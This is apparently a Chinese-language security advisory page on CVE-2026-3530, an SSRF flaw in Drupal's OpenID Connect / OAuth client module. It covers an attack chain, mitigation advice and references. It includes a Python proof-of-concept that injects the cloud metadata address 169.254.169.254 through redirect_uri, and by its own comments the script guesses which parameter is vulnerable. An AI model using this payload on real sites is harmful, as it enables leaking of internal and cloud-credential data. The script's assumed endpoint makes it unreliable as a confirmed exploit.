CVE-2026-3530 CVSS 4.3 中危

CVE-2026-3530 Drupal OpenID Connect SSRF漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3530

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Drupal OpenID Connect / OAuth client

漏洞概述

Drupal OpenID Connect / OAuth client 模块存在服务器端请求伪造（SSRF）漏洞。由于该模块对用户提供的请求参数缺乏严格的校验，攻击者可利用此漏洞诱导服务器向内网发起请求。受影响版本涵盖 0.0.0 至 1.5.0 之前的所有版本，可能导致敏感信息泄露风险。

技术细节

该漏洞属于典型的服务端请求伪造（SSRF）类型。Drupal 的 OpenID Connect / OAuth client 模块在实现 OAuth 流程时，未对回调地址或关联的 URL 参数进行有效的网络位置校验。攻击者首先需要拥有 Drupal 站点的低权限账户（PR:L），随后在交互过程中注入恶意内网地址（如 http://127.0.0.1/admin 或云元数据服务）。由于验证逻辑存在缺陷，服务器端应用会代替攻击者向该内网地址发送 HTTP 请求。虽然该漏洞未改变攻击范围（S:U），主要危害在于较低的机密性泄露（C:L），攻击者无法直接破坏系统完整性或可用性，但利用此漏洞可对内网基础设施进行端口扫描，探测未授权的服务，甚至结合其他漏洞进行更深层次的攻击。CVSS 3.1 评分 4.3 也反映了其作为中危风险的特性。

攻击链分析

STEP 1

步骤1：侦察与权限获取

攻击者注册或获取目标 Drupal 网站的低权限用户账户（PR:L）。

STEP 2

步骤2：构造恶意请求

攻击者利用该低权限账户，向 OpenID Connect 模块接口发送请求，并在参数（如 redirect_uri）中注入内网地址（如 127.0.0.1）。

STEP 3

步骤3：服务端请求伪造

Drupal 服务器接收请求后，由于未充分过滤 URL，向攻击者指定的内网地址发起连接请求。

STEP 4

步骤4：信息泄露

攻击者根据服务器的响应时间或返回内容，判断内网端口状态或获取敏感信息（C:L）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-3530 SSRF in Drupal OpenID Connect / OAuth client
import requests

target_url = "http://drupal-site.example.com/openid-connect/callback"
# Example payload targeting an internal metadata service
internal_target = "http://169.254.169.254/latest/meta-data/"

# Assuming the vulnerable endpoint takes a 'redirect_uri' or similar parameter
# that is eventually fetched by the server without validation.
payload = {
    "code": "arbitrary_code",
    "state": "arbitrary_state",
    "redirect_uri": internal_target
}

try:
    print(f"Sending request to {target_url} with payload: {payload}")
    response = requests.post(target_url, data=payload)
    
    # Analyze response to check if the internal target was accessed
    if response.status_code == 200 and "meta-data" in response.text:
        print("[+] Potential SSRF successful! Internal content leaked.")
        print(response.text[:500])
    else:
        print("[-] Exploit failed or target not vulnerable.")
except Exception as e:
    print(f"Error occurred: {e}")

影响范围

Drupal OpenID Connect / OAuth client < 1.5.0

防御指南

临时缓解措施

在未完成模块升级前，建议管理员严格限制该模块的使用权限，仅分配给受信任的管理员。同时，通过网络 ACL 规则阻断 Drupal 服务器对内网敏感网段（如 127.0.0.1, 169.254.169.254）的访问请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-3530
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-3530
3 Details https://www.cvedetails.com/cve/CVE-2026-3530/
4 VulDB https://vuldb.com/cve/CVE-2026-3530
5 Link https://www.drupal.org/sa-contrib-2026-025

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表